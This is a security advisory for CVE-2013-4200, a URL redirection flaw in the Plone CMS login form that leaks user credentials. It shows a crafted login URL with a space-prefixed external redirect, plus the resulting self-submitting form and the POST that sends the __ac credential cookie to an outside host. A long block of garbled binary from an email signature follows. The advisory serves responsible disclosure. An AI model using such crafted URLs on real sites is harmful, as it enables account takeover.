CVE-2013-4200 - Plone URL redirection / Forwarding of cookie data (session hijack) in certain browsers Jan 16 2014 12:25PM
Alexandre Herzog (alexandre herzog csnc ch)
#############################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# Product: Plone CMS
# Vendor: Plone Foundation (http://plone.org)
# ID(s): CSNC-2013-013, CVE-2013-4200
# Subject: URL Redirection Vulnerability
# Risk: High
# Effect: Remotely exploitable
# Author: Cyrill Bannwart <cyrill.bannwart (at) csnc (dot) ch [email concealed]>
# Date: 20/05/2013
#
#############################################################

Introduction:
-------------
The discovered vulnerability targets the open source Plone CMS. The
credentials of a valid user can be obtained by using a specially
crafted URL which can be sent to the user by email. When clicking on
the URL, the user is presented with the website's login form and after
a successful login the user as well as his credentials are forwarded to
an external server. This vulnerability can be used by an attacker to
obtain access to a user's account.

Affected:
---------
Vulnerable:
* Plone < 4.3.1

Technical Description:
----------------------
An attacker can craft a URL for the login form where his victim has
valid credentials. The created URL contains a redirection URL to which
the user as well as his credentials are forwarded after a successful
login. This URL can be sent to the victim by mail.

By inserting a space before the redirection URL the isURLInPortal()
method of the URLTool class assumes the URL to be relative, not
filtering it against the allow_external_login_sites property.

Example of crafted URL:
https://example.com/acl_users/credentials_cookie_auth/require_login?next
=+https%3A//www.csnc.ch

Once the victim clicks on the URL and logs in, a self-submitting POST
form is loaded that sends the user and his credentials to the external
server.

Example excerpt of HTTP Response:
HTTP/1.1 200 OK
Set-Cookie: __ac="<CREDENTIALS>"; Path=/; HTTPOnly
[CUT]
<form method="post" id="external_login_form" name="external_login_form" action=" https://www.csnc.ch">
<input type="hidden" name="__ac" value="<CREDENTIALS>" />
</form>
<script type="text/javascript">
/*jslint browser: true */
var external_login_form = document.forms.external_login_form;
external_login_form.style.display = 'none';
external_login_form.submit();
</script>

And resulting HTTP POST Request:
POST / HTTP/1.1
Host: www.csnc.ch
Referer: https://www.example.com/login_form
[CUT]
__ac=<CREDENTIALS>

The obtained credentials / cookie content can be used by the attacker to
login to the website and gain access to the victim's account.

The login form allows further URL parameters such as the password reset
link or the sign up URL that can also be tricked into accepting
non-relative URLs.

Workaround / Fix / Patch:
-------------------------
Patch has been released by vendor

Timeline:
---------
2013-05-08: Vulnerability discovered
2013-05-20: Vendor notified
2013-05-21: Vendor acknowledged
2013-06-18: Patch released
2013-07-02: Patch updated
2014-01-16: Disclosure

References:
-----------
https://plone.org/products/plone/security/advisories/20130618-announceme
nt
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4200
0?n *?H?÷
 ?_0?[1 0 +0  *?H?÷
 ?+0?û0?ã }i>Y-sR⧭[³è30
 *?H?÷
0U1 0 UCH10U
 SwissSign AG1/0-U&SwissSign Personal Silver CA 2008 - G20
120820133715Z
150820133715Z0I10U Email Validated Only1(0&UEmail: alexandre.herzog (at) csnc (dot) ch0 [email concealed]?"0
 *?H?÷
?0?
?º?G?´Æ]ÿº?Ô­{R7?w9ú ®B6¯býÆ6%MæGWbSе¾"ìÇ/SèÕö6
bJa*ù¥'¬ÃVp·#<yù?vþWIît±ÒOÏsÐá
Ѿ«ÂmDï(Ä19?ùýf[
¥,´þªÝÚ8¥( äò?ÔÛ¥ÌÙUõvm«/|ލùÐ?ô]?¼au¿rÅ1???puíÓT|??eÿïgü4ZØÑ?GeD?í?4??]ú?¹YË?
]Ùh 2?£õ!7æÜ?ä Idô¾d=?ÿ¤â²q$R|oÿmÛï]ßEÍI?»ý}?£?Ò0?Î0Uÿ°0U%
 0
+0Uâͪö*WéÚÿÂ$Ò"?'Iu0U#0?ë5±Vm`Xôá"ÍF®Ð
e0ÿU÷0ô0G E C?Ahttp://crl.swisssign.net/EB35B1566D156058F4E122CD
1C461CAED00400650¨ ¥ ¢??ldap://directory.swisssign.net/CN=EB35B1566D
156058F4E122CD1C461CAED0040065%2CO=SwissSign%2CC=CH?certificateRevocatio
nList?base?objectClass=cRLDistributionPoint0dU ]0[0Y `?tY0L0J+>http://repository.swisssign.com/SwissSign-Silve
r-CP-CPS-R4.pdf0Ù+Ì0É0d+0?Xhttp://swisssign.net/cgi
-bin/authority/download/EB35B1566D156058F4E122CD1C461CAED00400650a+
0?Uhttp://silver-personal-g2.ocsp.swisssign.net/EB35B1566D156058F4E12
2CD1C461CAED00400650#U0alexandre.herzog (at) csnc (dot) ch0 [email concealed]
 *?H?÷
?eà?ÞÁU©þO¿ÇJ
à;.¬~"³²`??pÍ?{î?|YûÆ¢ýÓ?o¸òäÖ;`AW©º?C?S6?¡¤xïÞz}ñ¯9èa£luÆ@?^
?¾Þu¢~p¶É
*Þ©ìÙ?ÇÌQ?h·)Z`*?'R{Ý?PT0???í&°·¹?+ô?I¦3ËÇÍ¿jL cO$³\r\} EÀÃ@"ÁãUÎd9ø
²ZÍÜ2µf΍ã§8ÐA§?ÅúTã??ÊU à??æ??­??+P?(¥J@P}«??_*±¢?,8?Ôݐ¹+*y?Z0?g0?O  âV·S?kvX0
 *?H?÷
0G1 0 UCH10U
 SwissSign AG1!0USwissSign Silver CA - G20
080709111109Z
230709111109Z0U1 0 UCH10U
 SwissSign AG1/0-U&SwissSign Personal Silver CA 2008 - G20?"0
 *?H?÷
?0?
?÷óS^Im?å'!`¥v??¸!@Ï63¬*r?aÃkÞzIX=?Ø;ðA¿kV³=¿cº1~ârFh?
×?O É{©Ð9Ñ?Ö5ghvÁ_? ÍÏ:Ñ?
ÚòCò¤¢¬?u è÷4§¿¶æ9hfRG9)M´è*­a´¢1à?ÛäCñ+ÞÁ4Ël?îb'DØ1ñß<!ÌÀ¬h
ÓthÉJ?; §±e¤®.zÞzDo°þtÿ?õXé¦%ñÌ?"'ØË1Á/( qr÷ûNnz¬!?
Zfø¿åù?Ä?º3
??]®¡£?F0?B0Uÿ0Uÿ0ÿ0Uë5±Vm
`Xôá"ÍF®Ðe0U#0? ÍÁäA¶:[;ËE½Â?ú?X0ÿU÷0ô0G E C?Ahttp
://crl.swisssign.net/17A0CDC1E441B63A5B3BCB459DBD1CC298FA86580¨ ¥ ¢?
?ldap://directory.swisssign.net/CN=17A0CDC1E441B63A5B3BCB459DBD1CC298FA8
658%2CO=SwissSign%2CC=CH?certificateRevocationList?base?objectClass=cRLD
istributionPoint0dU ]0[0Y `?tY0L0J+>http://repository.swisssign.com/SwissSign-Silve
r-CP-CPS-R3.pdf0t+h0f0d+0?Xhttp://swisssign.net/cgi-bi
n/authority/download/17A0CDC1E441B63A5B3BCB459DBD1CC298FA86580
 *?H?÷
?.*vÚ?óLßd'á[-?ï¹U.Û¸ e1@°K½|±ÙØqSÎè5,?ºt?ÔW?ÀW??P%{à?Ô]¸Dxé3Aþá¿F?y}r¼8PÀhZ²ÓÞ]gÏi?ø
õ¬ ?ÔÝZ.j9#ïôïsZ6Ãé Gd79y×P²¬º?ê?äEF¾Í/9?
?ðU²&$Q³kÑ|i=XՁ5<hGWÆ³Ï*jE/?©N=Á9ÊëûÞJ?­¸a? ¸?#´vC?®?8^Ò8õ?Ù Õ.øÉ??§ ³Ò(]#lNfñ?c ÜbÄGâr¢àm~=]?E?h?¥ðõíÛ??Îé¦?Úßn5Ú`ö°G?4å¼`´ÀÀ(ôn<¹ú
I?:e8´µa??!ï??Åu(5«^R`/:ï1?¦{÷H p<µ×bË´BÃô¸Dq?$ü×î?!èªc?ÃÏ[òÒ?p'TÌî¡Ñ "?^Ð?C9ªRNgÚ2¼Z??Ú6«Szôwêü×èÞê?ÆnPDàÏ0Ê??¡ §ü¹èÅ-ósõTþ(א##)OI3y
?J^a?f]Ñ?o?.![eDÍvIò¥ƶ~?¢6£)¡x«$]ð
t

y?aHUÞF¹¹Ûª?0?½0?¥ OÔ/T»/K0
 *?H?÷
0G1 0 UCH10U
 SwissSign AG1!0USwissSign Silver CA - G20
061025083246Z
361025083246Z0G1 0 UCH10U
 SwissSign AG1!0USwissSign Silver CA - G20?"0
 *?H?÷
?0?
?Äñ?Óx1÷8ÉøÃ?C¼Ç÷¼7çNqºK¥s\n?®W®87C/=ÈÎhÁx®+ú,y?öè¹h¹UòD§9
ùü?ñ¢M'ùa{º·å¢¶ëa>ÐlÑæûú^í´? 5[¡?ËðI?þ?
>æÙ âO»Ü?7ü?é25"Ñ:N'?°?2Úa
GM`B®?Gè?ZPXé??¹]¡ÜÝ?J6g»Hä?¶7ëH:¯gèÊïj1?ÔÀ¶ù?q{gd¸¶?JB{e.0j õî?æòÍ?ìÙ¡Jìö²KåE?æmx?.??m6©Ä1d?? *ô5
xÉUÏA°Gé0??¾a¨?¹(z_8Ù©8°?sÁÃ;H*?!?¸Ì¨5Ã??³>¾¤?i:?xÙÉô?«V~[??9?¤
, 2?`³?À*¶ ~IòJùÕF/?£?§&¬»?<æ¼GÜsQñpd/ù´G0lDê)7??hf¼?8þ{9.ÓPðû^
`¶©¦ú'Añ?ròõ?tJÉgÄT®Hdß?Ñn°á??qéLØ¥÷GtÑQ??ó¢#@ sÛK¦çs?Á éÁY¬Fú
æ/øÏq?Fm¹Ä8yEHïÄ]×î?9"?²
XC÷q©H.ýêÖ£¬0©0Uÿ0Uÿ0ÿ0U ÍÁäA
¶:[;ËE½Â?ú?X0U#0? ÍÁäA¶:[;ËE½Â?ú?X0FU ?0=0; `?tY0.0,+ http://repository.swisssign.com/0
 *?H?÷
?sƁà'Ò-à?0â?AP,__ba©?ji tIÖ]?êARoX­PV jƽ(iX?Ü?5©:¼¥`?ØE?iÙ~»xrÁ*Ώ?pa¬ Í ¸9)V?2N?»=Ä*Ù×rîþQ¡"A±qc?°
b«^WßËÝu À]y?àPæÞ1þ?{p_¥Ø­ø¶oÓ`Ý@K"Å=­:z?G?y3º?Ü2i?nKðqþãgr ±¿
\?äú?"Ç?¹#??í%àÏe»õaïݲZA"Z¡?],è[Ém© xª`ÆVZ h¼iyÄ~?¿Åé$Q^ÔÕKSíÙ#Z6e£Á­A0óF?¯eµÕ±ä[xu?zmY©*{ÞÃ???IsxÈ=½Q5t
*Õñ~i*»;½%¸?Z=raf?î ÖMÔt jþ ü£UW?þJË®[Èò#1S8Ò-j??¹j÷^AtnÃ~¬)`??8ÊW
½0/Ç¥æA Ú®?? ¤elL ?º¸Ó¹À??0úå?kNgªÚbV>?fÒÄ6}§>ü?àÔ?彪óN£zjùbrã Oë?#ñ?»|ÜÜl?%²ò´cÒ*g??õÎêØ?jìä
»*Lë `9ÎÊbØ.n1? 0?0h0U1 0 UCH10U
 SwissSign AG1/0-U&SwissSign Personal Silver CA 2008 - G2}i>Y-sR⧭[³è30 + z0# *?H?÷
 1%þZðÚ»ÿà`hÔÅÍ
@¾qö0 *?H?÷
 1  *?H?÷
0 *?H?÷
 1
140116122547Z0 *?H?÷
 10 0
*?H?÷
0
 *?H?÷
?ñGÀ¤ëé@ÝcvËã ?0§ÿ5:c?¬Gt¾ßs5 &0????³ ?ÊÖüK³òþ¶( 4$­ñ?SÕ6y?ز!_á
îA~??8úvçPEê~½@?´?¢NwrôH>±?lÏ?½%¨)Ã÷±?i.g!8×ô{_Ù·婾Ëê%j\? ·¤6Xt¼sÃÓaW}úÐ?Yëe[¨O¬ÀŐ:éXX·Òölä?Ô¹lÌÊH
?d¢ñU=i@é(:?s¶Ï®8|RÇy¥ºFD:C?ÿ`?¯J¸û=?Ê[¥nP??NQ1ÍPÏd?ê¥_J±@±÷¢tjDlî

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus